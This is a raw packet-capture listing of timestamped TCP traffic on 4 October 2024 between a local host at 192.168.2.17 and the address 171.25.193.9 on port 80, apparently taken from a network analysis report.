                                                                              Oct 4, 2024 08:44:27.471172094 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471174955 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471312046 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471322060 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471364021 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471364021 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471539974 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471550941 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471561909 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471591949 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471591949 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471652031 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471784115 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471795082 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471813917 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471823931 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471836090 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471837044 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471847057 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471859932 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.471865892 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471903086 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.471903086 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.472476959 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472489119 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472500086 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472511053 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472527027 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472534895 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472543001 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472551107 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472559929 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472567081 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472573042 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.472580910 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.472580910 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.472723961 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.473403931 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473417044 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473428011 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473439932 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473450899 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473462105 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473473072 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473485947 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473490000 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.473496914 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473509073 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.473541975 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.473666906 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.475743055 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.475780964 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.475790977 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.475914955 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.475928068 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.475940943 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.475955009 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.475974083 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.475974083 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.476015091 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.476015091 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.476140022 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.476226091 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.476238966 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.476327896 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.476340055 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.476353884 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.476377010 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.476377010 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.476484060 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.476527929 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.476533890 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.481163979 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.484635115 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.484661102 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.484673023 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.484750032 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.484750032 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.484796047 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.484808922 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.484819889 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.484862089 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.484910011 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485229015 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485280991 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485287905 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485301971 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485325098 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485352039 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485466003 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485477924 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485490084 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485502005 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485529900 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485562086 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485724926 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485738039 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485758066 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485764980 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485820055 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485820055 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.485980034 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.485991955 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.486005068 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.486016035 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.486027956 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.486037970 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.486072063 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.486072063 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.486108065 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.487099886 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.487159967 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.487183094 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.532174110 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.533164024 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.558938980 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.559309959 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.564459085 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589109898 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589131117 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589144945 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589157104 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589463949 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.589477062 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589530945 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589543104 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589637041 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.589654922 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589667082 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589684010 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589721918 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.589776993 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.589843035 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589916945 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589926958 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.589970112 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.590051889 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590064049 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590075016 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590132952 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.590132952 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.590415001 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590476036 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590487957 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590637922 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.590883017 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590960026 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.590960979 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.590974092 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591087103 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591097116 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591108084 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.591128111 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591130972 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.591140985 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591213942 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.591480970 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591521025 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591531038 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591562986 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.591630936 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591640949 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.591691017 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.592144966 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.592205048 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.592230082 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.592243910 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.592339993 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.592339993 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.592421055 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.592499018 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.592500925 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.592513084 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.592554092 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.592556000 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.592658043 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593178988 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593230009 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593251944 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593265057 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593296051 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593346119 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593347073 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593410969 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593424082 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593556881 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593694925 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593741894 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593756914 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593770027 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593811989 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593946934 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.593955994 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.593961000 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.594027042 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.594094992 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.594108105 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.594144106 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.594240904 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.594258070 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.594269991 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.594280005 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.594290972 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.594291925 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.594362020 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595168114 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595228910 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595242977 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595257044 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595298052 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595393896 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595403910 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595418930 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595474958 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595474958 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595490932 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595503092 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595514059 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595561981 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595561981 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595611095 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595623970 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595695972 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595706940 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.595710039 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.595838070 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.598973036 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599013090 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599025011 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599121094 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.599121094 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.599129915 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599214077 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599229097 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599266052 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.599349976 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599361897 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.599570990 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.599976063 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600065947 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600128889 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600141048 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600188971 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600199938 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600210905 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600215912 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600217104 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600272894 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600352049 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600436926 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600447893 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600457907 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600469112 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600480080 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600522041 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600522041 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600622892 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600635052 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600645065 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600701094 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600701094 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600795984 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600800991 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600902081 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.600917101 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.600929022 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.601002932 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.604742050 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.604775906 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.604789019 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.604809046 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.604875088 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.604907036 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.604929924 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.604952097 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.605020046 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605026960 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605036020 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.605124950 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.605128050 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605140924 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605153084 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605164051 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605185032 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.605263948 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.605314016 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605376959 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.605391026 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605402946 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605479002 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.605895996 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605986118 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.605997086 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606031895 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606033087 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606045008 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606117964 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606172085 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606184959 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606254101 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606266022 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606278896 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606336117 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606410980 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606456995 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606468916 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606478930 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606581926 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606601000 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606612921 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606622934 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606633902 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606643915 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606654882 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606658936 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606682062 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606708050 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.606899977 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606911898 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606920004 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.606992006 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.607048035 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607059956 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607072115 CEST8049725171.25.193.9192.168.2.17
                                                                              Oct 4, 2024 08:44:27.607178926 CEST4972580192.168.2.17171.25.193.9
                                                                              Oct 4, 2024 08:44:27.607218027 CEST8049725171.25.193.9192.168.2.17
